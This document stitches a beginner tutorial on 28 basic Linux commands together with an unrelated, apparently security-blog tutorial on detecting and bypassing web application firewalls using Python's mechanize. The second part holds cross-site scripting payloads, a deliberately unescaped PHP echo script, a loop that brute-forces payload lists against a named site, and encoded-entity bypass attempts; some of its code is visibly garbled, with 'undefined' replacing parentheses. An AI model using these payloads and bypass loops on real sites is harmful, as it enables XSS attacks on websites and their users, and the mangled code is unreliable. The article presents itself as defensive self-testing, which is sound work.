28 MOST FREQUENTLY USED BASIC LINUX COMMANDS WITH EXAMPLES

Introduction
In this article we are going to discuss on some most frequently used basic Linux commands with examples. This article is mainly useful for beginners who just started to learn Linux or want to learn Linux. In this topic we have included all those basic Linux commands by which you can easily operate Linux operating system easily from terminal.

So let’s have a look at basic Linux commands with examples
1. List Files & Directories using ls
## ls basic Linux commands with examples
To list files and directories in Linux we can use ls command. Refer the command below.

elinuxbook@ubuntu:~$ ls
app Desktop Documents Downloads file.txt Music Pictures Public Templates Videos

List files & Directories with some important details like Permissions, Owner, Symlink & Hardlink details, Created Date, File & Directories name.

elinuxbook@ubuntu:~$ ls -l
total 36
drwxrwxr-x 3 elinuxbook elinuxbook 4096 Aug 20 2017 app
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Desktop
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Documents
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Downloads
-rw-rwxrwx 1 elinuxbook elinuxbook 0 Feb 20 09:40 file.txt
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Music
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Pictures

List Hidden files & directories.

elinuxbook@ubuntu:~$ ls -a
. .bash_history .cache Desktop Downloads .gnupg .lesshst Music .profile .sudo_as_admin_successful .Xauthority
.. .bash_logout .compiz .dmrc file.txt .HipChat .local Pictures Public Templates .xsession-errors
app .bashrc .config Documents .gconf .ICEauthority .mozilla .pki .QtWebEngineProcess Videos .xsession-er

List files & directories with it’s Inode number.

elinuxbook@ubuntu:~$ ls -li
total 36
284379 drwxrwxr-x 3 elinuxbook elinuxbook 4096 Aug 20 2017 app
278746 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Desktop
278760 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Documents
278757 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Downloads
134040 -rw-rwxrwx 1 elinuxbook elinuxbook 0 Feb 20 09:40 file.txt
278761 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Music
278762 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Pictures

## Basic Linux commands with examples to Manage Files & Directories
2. Create a Directory in Linux
Create a new directory in Linux using mkdir command.
elinuxbook@ubuntu:~$ mkdir data

3. Delete a Directory
Delete a directory using rmdir command.

elinuxbook@ubuntu:~$ rmdir data

4. Remove/Delete a file
Delete a file using rm command.
elinuxbook@ubuntu:~$ rm file.txt

To delete a directory with content we have to use rm command with argument -rf to delete it forcefully.
elinuxbook@ubuntu:~$ rm -rf data

## Basic Linux commands with examples to Manage Users

5. Create a New user in Linux
To create a new user in Linux you can use useradd command. Refer the command below.
elinuxbook@ubuntu:~$ sudo useradd helpdesk

Also Read :

6. Set Password for a User
Set password for a user using passwd command.

elinuxbook@ubuntu:~$ sudo passwd helpdesk
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

7. Delete a User
Delete a user using userdel command.
elinuxbook@ubuntu:~$ sudo userdel helpdesk

8. Change Permission in Linux
To change permission of files & directories in Linux you can use chmod command. Here I have shown some examples.
Allow Full access (i.e. Read, Write, Execute) to Owner/User for a file file.txt.

elinuxbook@ubuntu:~$ chmod u+rwx file.txt

Remove Write & Execute permission from Owner/User.
elinuxbook@ubuntu:~$ chmod u-wx file.txt

Allow Read, Write, Execute permission to everyone.
elinuxbook@ubuntu:~$ chmod a+rwx file.txt

You can also Allow Read, Write, Execute permission to everyone in Numerical method.

elinuxbook@ubuntu:~$ chmod 777 file.txt

9. Change Ownership of Files & Directories
You can change ownership of files & directories in Linux using chown command. The Syntax to change ownership is :
chown username:groupname filename
Change ownership of a file file.txt.

elinuxbook@ubuntu:~$ sudo chown elinuxbook:helpdesk file.txt

elinuxbook@ubuntu:~$ ls -l file.txt
-rw-rw-r– 1 elinuxbook helpdesk 0 Feb 21 07:52 file.txt

Change Group Ownership of a file using chown command.
elinuxbook@ubuntu:~$ sudo chown :elinuxbook file.txt

elinuxbook@ubuntu:~$ ls -l file.txt
-rw-rw-r– 1 elinuxbook elinuxbook 0 Feb 21 07:52 file.txt

## Basic Linux commands with examples for Backup
10. Backup data using Tar
Create a archive in Linux using Tar command.

elinuxbook@ubuntu:~$ tar -cvf file.tar file.txt

Create a Tar archive with gzip compression.
elinuxbook@ubuntu:~$ tar -czvf file.tar.gz file.txt

Extract a gzip compressed Tar archive.
elinuxbook@ubuntu:~$ tar -xzvf file.tar.gz

## Basic Linux commands with examples to compress files & directories

11. Compress Files & Directories using gzip command
Compress a file using gzip command.
elinuxbook@ubuntu:~$ gzip file.txt

Extract a gzip (.gz) compressed file.
elinuxbook@ubuntu:~$ gzip -d file.txt.gz

OR you can also use gunzip command to extract gzip compressed file.

elinuxbook@ubuntu:~$ gunzip file.txt.gz

## Basic Linux commands with examples to Shutdown the System.
12. Shutdown Linux Operating System
To immediately shutdown a linux system you can use  below command.
elinuxbook@ubuntu:~$ shutdown -h now

Shutdown a system after 10 minute.

elinuxbook@ubuntu:~$ shutdown -h +10

Cancel a scheduled Shutdown using shutdown command with argument -c.
elinuxbook@ubuntu:~$ shutdown -c

Reboot the system after 10 minute using shutdown command with argument -r.
elinuxbook@ubuntu:~$ shutdown -r +10

13. Compress files & directories using bzip2 compression
Compress a file using bzip2 command.

elinuxbook@ubuntu:~$ bzip2 test.txt

Extract a bzip2 compressed file (i.e. bz2) using bzip2 command with argument -d.
elinuxbook@ubuntu:~$ bzip2 -d test.txt.bz2

14. Copy files in Linux
You can copy files & directories in Linux using cp command. Here I am copying a file named file.txt in to a directory named data. Refer the command below.
Syntax : cp Source Destination

elinuxbook@ubuntu:~$ cp file.txt data/

15. Move/Rename file in Linux
Move OR Rename file in Linux using mv command.
Syntax : mv Source Filename Destination Filename
elinuxbook@ubuntu:~$ mv file.txt data/myfile.txt

16. Change Directory in Linux
Use cd command to Change Directory in Linux. Refer the command below.

elinuxbook@ubuntu:~$ cd data/

17. Check Current Working Directory
To check current working directory in Linux you can use pwd command. The full form of pwd is Print Working Directory. As you can see below my current working directory is “/home/elinuxbook“.
elinuxbook@ubuntu:~$ pwd
/home/elinuxbook

18. Create a New file
To create a new file in Linux you can use touch command.
elinuxbook@ubuntu:~$ touch file.txt

## ## Basic Linux commands with examples to check Process Status in Linux

19. Check Process Status in Linux
To check process status in Linux you can use ps command.
elinuxbook@ubuntu:~$ ps
PID TTY TIME CMD
2936 pts/4 00:00:03 bash
11022 pts/4 00:00:00 ps

ps command with argument -ef will show you Process Status in More details like User ID, Process ID, CPU utilization, Memory Utilization, Terminal Details and so on.
elinuxbook@ubuntu:~$ ps -ef | less

20. List connected Disks/Medias
You can List all connected Hardisks, Pen Drives and many more using fdisk command with argument -l. Refer the command below.

elinuxbook@ubuntu:~$ sudo fdisk -l
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa5466322

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 37750783 37748736 18G 83 Linux
/dev/sda2 37752830 41940991 4188162 2G 5 Extended
/dev/sda5 37752832 41940991 4188160 2G 82 Linux swap / Solaris

## Basic Linux commands with examples to check Mounted Devices in Linux
21. List Mounted Devices in Linux
You can list all mounted devices in Human Readable format using df command with argument -h.
elinuxbook@ubuntu:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 966M 0 966M 0% /dev
tmpfs 199M 14M 185M 7% /run
/dev/sda1 18G 4.9G 12G 30% /
tmpfs 992M 212K 992M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
tmpfs 199M 64K 199M 1% /run/user/1000

Only df command will list mounted devices in Blocks.

elinuxbook@ubuntu:~$ df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 988812 0 988812 0% /dev
tmpfs 203012 14032 188980 7% /run
/dev/sda1 18447100 5124524 12362476 30% /
tmpfs 1015056 212 1014844 1% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 1015056 0 1015056 0% /sys/fs/cgroup
tmpfs 203012 64 202948 1% /run/user/1000

List mounted Devices with it’s Inode Numbers.
elinuxbook@ubuntu:~$ df -ih
Filesystem Inodes IUsed IFree IUse% Mounted on
udev 242K 459 241K 1% /dev
tmpfs 248K 683 248K 1% /run
/dev/sda1 1.2M 228K 925K 20% /
tmpfs 248K 9 248K 1% /dev/shm
tmpfs 248K 6 248K 1% /run/lock
tmpfs 248K 17 248K 1% /sys/fs/cgroup
tmpfs 248K 31 248K 1% /run/user/1000

## Basic Linux commands with examples to check Network Configurations
22. Check IP Address in Linux
To check IP Address in Linux you can use ifconfig command.

elinuxbook@ubuntu:~$ ifconfig
ens33 Link encap:Ethernet HWaddr 00:0c:29:ff:cd:2e
inet6 addr: 2405:204:f196:72e6:f609:9c3f:ccb7:8841/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:3f17:e549:58e6:254b/64 Scope:Global
inet6 addr: 2405:204:f196:72e6:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f109:105f:a531:82b3:8d4a:c712/64 Scope:Global
inet6 addr: 2405:204:f109:105f:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: fe80::b396:d285:b5b3:81c3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8909 errors:0 dropped:0 overruns:0 frame:0
TX packets:8903 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9662594 (9.6 MB) TX bytes:1080952 (1.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:61437 errors:0 dropped:0 overruns:0 frame:0
TX packets:61437 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4568449 (4.5 MB) TX bytes:4568449 (4.5 MB)

Use the below command to check IP Address of a particular Interface. Here I am checking IP Address of the Interface ens33.
elinuxbook@ubuntu:~$ ifconfig ens33
ens33 Link encap:Ethernet HWaddr 00:0c:29:ff:cd:2e
inet6 addr: 2405:204:f196:72e6:f609:9c3f:ccb7:8841/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:3f17:e549:58e6:254b/64 Scope:Global
inet6 addr: 2405:204:f196:72e6:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f109:105f:a531:82b3:8d4a:c712/64 Scope:Global
inet6 addr: 2405:204:f109:105f:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: fe80::b396:d285:b5b3:81c3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8909 errors:0 dropped:0 overruns:0 frame:0
TX packets:8903 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9662594 (9.6 MB) TX bytes:1080952 (1.0 MB)

## Basic Linux commands with examples for Package Installation.
23. Install Packages in Linux using rpm command
You can use rpm command to install a package in Linux.

[root@elinuxbook ~]# rpm -ivh dhcp-3.0.5-23.el5.x86_64.rpm
warning: dhcp-3.0.5-23.el5.x86_64.rpm: Header V3 DSA signature: NOKEY, key ID 37017186
Preparing… ########################################### [100%]
1:dhcp ########################################### [100%]

rpm command with argument -qc will list configuration files of a particular package. Here I am listing configuration files of package Vsftpd FTP Server.
[root@elinuxbook ~]# rpm -qc vsftpd
/etc/logrotate.d/vsftpd.log
/etc/pam.d/vsftpd
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd_conf_migrate.sh

Update a installed package from It’s lower version to higher version using below command.
[root@localhost ~]# rpm -Uvh dhcp-4.1.1-51.P1.el6.centos.x86_64.rpm
Preparing… ########################################### [100%]
1:dhcp ########################################### [100%]

24. Install Package in Linux using yum command
Install a Package in Linux using yum command. Refer the command below.

[root@elinuxbook ~]# yum install dhcp
Loaded plugins: fastestmirror, refresh-packagekit, security
Setting up Install Process
Loading mirror speeds from cached hostfile
* base: mirror.nbrc.ac.in
* extras: mirrors.nhanhoa.com
* updates: centos-hcm.viettelidc.com.vn
base | 3.7 kB 00:00
extras | 3.4 kB 00:00
updates | 3.4 kB 00:00
Resolving Dependencies
–> Running transaction check
—> Package dhcp.x86_64 12:4.1.1-51.P1.el6.centos will be installed
–> Finished Dependency Resolution

Dependencies Resolved

================================================================================
Package Arch Version Repository Size
================================================================================
Installing:
dhcp x86_64 12:4.1.1-51.P1.el6.centos base 823 k
.
.
Installed:
dhcp.x86_64 12:4.1.1-51.P1.el6.centos

Complete!

You can List installed packages using below command.
[root@elinuxbook ~]# yum list installed

List most recently installed packages using below command.
[root@elinuxbook ~]# yum list recent
Loaded plugins: fastestmirror, refresh-packagekit, security
Loading mirror speeds from cached hostfile
* base: mirror.nbrc.ac.in
* extras: centos-hn.viettelidc.com.vn
* updates: centos-hn.viettelidc.com.vn
Recently Added Packages
openjpeg.x86_64 1.3-16.el6_8 updates
openjpeg-devel.i686 1.3-16.el6_8 updates
openjpeg-devel.x86_64 1.3-16.el6_8 updates
openjpeg-libs.i686 1.3-16.el6_8 updates
openjpeg-libs.x86_64 1.3-16.el6_8 updates
tomcat6.noarch 6.0.24-105.el6_8 updates
tomcat6-admin-webapps.noarch 6.0.24-105.el6_8 updates

25. Check your installed Operating System details using uname command
Just uname command will show you the name of your currently installed operating system name.

elinuxbook@ubuntu:~$ uname
Linux

uname command with argument -a will display Operating System Name, Kernel Version, OS architecture and so on.
elinuxbook@ubuntu:~$ uname -a
Linux ubuntu 4.13.0-32-generic #35~16.04.1-Ubuntu SMP Thu Jan 25 10:13:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

uname command with argument -o will show your operating system type. Here It’s GNU/Linux.
elinuxbook@ubuntu:~$ uname -o
GNU/Linux

## Basic Linux commands with examples to check Network Connectivity.

26. Check Network connectivity in Linux using ping command
You can check network connectivity in Linux using ping command by sending packets. Refer the command below.
elinuxbook@ubuntu:~$ ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.393 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.083 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.091 ms

— localhost ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3035ms
rtt min/avg/max/mdev = 0.083/0.164/0.393/0.132 ms

Normally ping command send’s unlimited packets. But you can ask ping command to send fixed packets by using argument -c. Here I wanted 3 packets hence set -c as 3. Refer the command below.
elinuxbook@ubuntu:~$ ping -c 3 localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.068 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.077 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms

— localhost ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 2017ms
rtt min/avg/max/mdev = 0.068/0.078/0.091/0.013 ms

ping command with argument -i will keep interval between packets as per mentioned time in Seconds. Here I have set Interval as 2 seconds.

elinuxbook@ubuntu:~$ ping -c 3 -i 2 localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.090 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms

— localhost ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 4028ms
rtt min/avg/max/mdev = 0.066/0.082/0.091/0.013 ms

27. Copy files & directories Securely over Network
You can copy files and directories in Linux over network using scp command. scp stands for Secure Copy.
scp root@10.10.0.125:/data/file.txt /root/

28. Securly take console/Remote of any system over network using ssh
Take remote of any system securely using ssh command. Refer the command below.
ssh root@10.10.0.125

Here we have tried to include all possible frequently used basic Linux commands with examples. If something missed out you can comment on comment box below.

If you found this article useful then Like us, Share this post on your preferred Social media, Subscribe our Newsletter OR if you have something to say then feel free to comment on the comment box below.

Web application firewalls are usually placed in front of the web
server to filter the malicious traffic coming towards server. If you are
hired as a penetration tester for some company and they forgot to tell
you that they are using web application firewall than you might get into
a serious mess. The figure below depicts the working of a simple web
application firewall:

As
you can see its like a wall between web traffic and web server, usually
now a days web application firewalls are signature based.
What is a signature based firewall?

In
a signature based firewall you define signatures, as you know web
attacks follow similar patters or signatures as well. So we can define
the matching patterns and block them, i.e.Payload :- <svg><script>alert&grave;1&grave;<p>The
payload defined above is a kind of cross site scripting attack, and we
know that all these attacks can contain following substring -> “<script>”,
so why don’t we define a signature that can block a web traffic if it
contains this sub string, we can define 2-3 signatures as defined below:
<script>
alert(*)

First
signature will block any request that contains
substring, and second one will block alert(any text). So, this is how
signature based firewall works.

How to know there is a firewall?

If
you are performing a penetration test and you didn’t know that there
was a firewall blocking the traffic than it can waste a lot of your
time, because most of the time your attack payloads are getting blocked
by the firewall not by your application code, and you might end up
thinking that the application you are testing have a secure good and is
good to go. So, it is a good idea to first test for web application
firewall presence before you start your penetration test.Most of
the firewalls today leave some tracks about them, now If you attack a
web application using the payload we defined above and get the following
response:HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable!Not Acceptable! An appropriate representation of the

requested resource could not be found on this server. This error was generated by Mod_Security.

You
can clearly see that your attack was blocked by the Mod_Security
firewall. In this article we will see how we can develop a simple python
script that can do this task detecting firewall and bypassing it.

Step 1: Define HTML Document and PHP Script!
We
will have to define our HTML document for injection of payload and
corresponding PHP script to handle the data. We have defined both of
them below.
We will be using the following HTML Document:

<html>
<body>
<form name=”waf” action=”waf.php” method=”post”>
Data: <input type=”text” name=”data”><br>
<input type=”submit” value=”Submit”>
</form>
</body>
</html>

PHP Script:

<html>
<body>
Data from the form : <?php echo $_POST[“data”]; ?><br>
</body>
</html>

Step 2: Prepare malicious request!
Our
second step towards detecting the firewall presence is creating a
malicious cross site scripting request that can be blocked by the
firewall. We will be using a python module called ‘Mechanize’, to know
more about this module please read the following article :

If
you already know about Mechanize, you can skip reading the article. Now
that you know about Mechanize, we can select the web form present on
any page and submit the request. Following code snippet can be used to
do that:

import mechanize as mec
maliciousRequest = mec.Browser()
formName=”waf”
maliciousRequest.open(“http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_form(formName)

Lets discuss this code line wise:

On the first line we’ve imported the mechanize module and given it a short name ‘mec’ for later reference.
To
download a web page using mechanize, instantiation of browser is
required. We’ve just did that in the second line of the code.
On
the first step we’ve defined our HTML document, in which the form name
was ‘waf’, we need to tell mechanize to select this form for submission,
so we’ve this name in a variable called formName.
Than we
opened this url, just like we do in a browser. After the page gets
opened we fill in the form and submit data, so opening of page is same
here.
Finally we’ve selected the form using ‘select_form’ function passing it ‘formName’ variable.

As
you can see in the HTML source code, that this form have only one input
field, and we are going to inject our payload in that field and once we
receive response we’re going to inspect it for know strings to detect
the presence of the web application firewall.

Step 3: Prepare the payload
In our HTML document we’ve specified one input field using this code:
input type=”text” name=”data”>
You can see that name of this field is ‘data’, we can use following bit of code to define input for this field :crossSiteScriptingPayLoad = “<svg><script>alert&grave;1&grave;<p>”

maliciousRequest.form[‘data’] = crossSiteScriptingPayLoad

First line saves our payload in a variable.
In a second line of code, we’ve assigned our payload to a form field ‘data’.

We can now safely submit this form and inspect the response.

Step 4: Submit the form and record Response
Code I am going to mention after this line will submit the form and record the response:maliciousRequest.submit()
response = maliciousRequest.response().read()

print response

Submit the form.
Save the response in a variable.
Print the response back.

As I currently have no firewall installed, the response I got is :As
you can see that payload is printed back to us, means no filtering is
present on the application code and due to the absence of firewall our
request was also not blocked.
Step 5: Detect the Presence of firewall
Variable
named ‘response’ contains the response we got from server, we can use
the response to detect presence of firewall. We will try to detect the
presence of following firewalls in this tutorial.

WebKnight.
Mod_Security.
Dot Defender.

Let see how we can achieve this with python code:if response.find(‘WebKnight’) >= 0:
       print “Firewall detected: WebKnight”
elif response.find(‘Mod_Security’) >= 0:
      print “Firewall detected: Mod Security”
elif response.find(‘Mod_Security’) >= 0:
      print “Firewall detected: Mod Security”
elif response.find(‘dotDefender’) >= 0:
      print “Firewall detected: Dot Defender”
else:
      print “No Firewall Present”

If Web Knight firewall is
installed and our request got blocked, response string will contain
‘WebKnight’ inside it some where, so find function will return value
greater than 0, that means WebKnight firewall is present. Similarly we
can check for other 2 firewalls as well.
We can extend this small application to detect for as many number of firewalls, but you must know there response behavior.

Using Brute force to bypass Firewall filter
I’ve
mentioned in the start of the article that mostly firewall these days
block requests based on signatures. But there are hundreds and thousands
of ways you can construct a payload. Java script is becoming complex
day by day, we can make a list of payloads, and try each of them, record
each response and check if we was able to bypass the firewall or not.
Please note that if firewall rules are well defined than this approach
might not work. Let see how we can brute force using python:listofPayloads = [‘&lt;dialog open=”” onclose=”alertundefined1)”&gt;&lt;form method=”dialog”&gt;&lt;button&gt;Close me!&lt;/button&gt;&lt;/form&gt;&lt;/dialog&gt;’, ‘&lt;svg&gt;&lt;script&gt;prompt&amp;#40 1&amp;#41&lt;i&gt;’, ‘&lt;a href=”&amp;#1;javascript:alertundefined1)”&gt;CLICK ME&lt;a&gt;’]
for payLoads in listofPayloads:
maliciousRequest = mec.Browserundefined)
formName=”waf”
maliciousRequest.openundefined”http://check.cyberpersons.com/crossSiteCheck.html”)
maliciousRequest.select_formundefinedformName)
maliciousRequest.form[‘data’] = payLoads
maliciousRequest.submitundefined)
response = maliciousRequest.responseundefined).readundefined)
if response.findundefined’WebKnight’) &gt;= 0:
print “Firewall detected: WebKnight”
elif response.findundefined’Mod_Security’) &gt;= 0:
print “Firewall detected: Mod Security”
elif response.findundefined’Mod_Security’) &gt;= 0:
print “Firewall detected: Mod Security”
elif response.findundefined’dotDefender’) &gt;= 0:
print “Firewall detected: Dot Defender”
else:
print “No Firewall Present”

On the first line we’ve defined a list of 3 payloads, you can extend this list and add as many payloads as you require.
Then inside the for loop we did the same process we did above, but this time for each payload in a list.
Upon receiving response we again compare and see see if firewall is present on not.

As I’ve had no firewall installed, my output was:

Convert HTML Tags to Unicode or Hex Entities
If
for example firewall is filtering html tags like <, >. We can
send their corresponding Unicode or Hex Entities and see if they are
being converted to there original form, if so, than this could be an
entry point as well. Code below can be used to examine this process:listofPayloads = [‘&lt;b&gt;’,’\u003cb\u003e’,’\x3cb\x3e’]
for payLoads in listofPayloads:
     maliciousRequest = mec.Browser()
     formName=”waf”
     maliciousRequest.open(“http://check.cyberpersons.com/crossSiteCheck.html”)
     maliciousRequest.select_form(formName)
     maliciousRequest.form[‘data’] = payLoads
     maliciousRequest.submit()
     response = maliciousRequest.response().read()
     print “—————————————————”
     print response
     print “—————————————————”

Each
time we will send the encoded entry and in the response we will examine
if it got converted or printed back without conversion, when I ran this
code I got the this output :

Means none of the encoded entry got converted to its original form.

Conclusion
The
purpose of this article was to train you in advance so that you can
penetrate your firewall before a hacker can do. It is always a good
choice to self test your network infrastructure for vulnerabilities,
because our first concern always is to get our application up and
running and we overlook the security part. But it must not be over
looked, because later it can be a huge headache.
Complete source code can be downloaded from this link.Author Info:
Usman Nasir, founder, and author of Cyberpersons
is a Computer Science student. I also worked as a technical support
staff at various hosting companies and love to write about Linux and web
application security.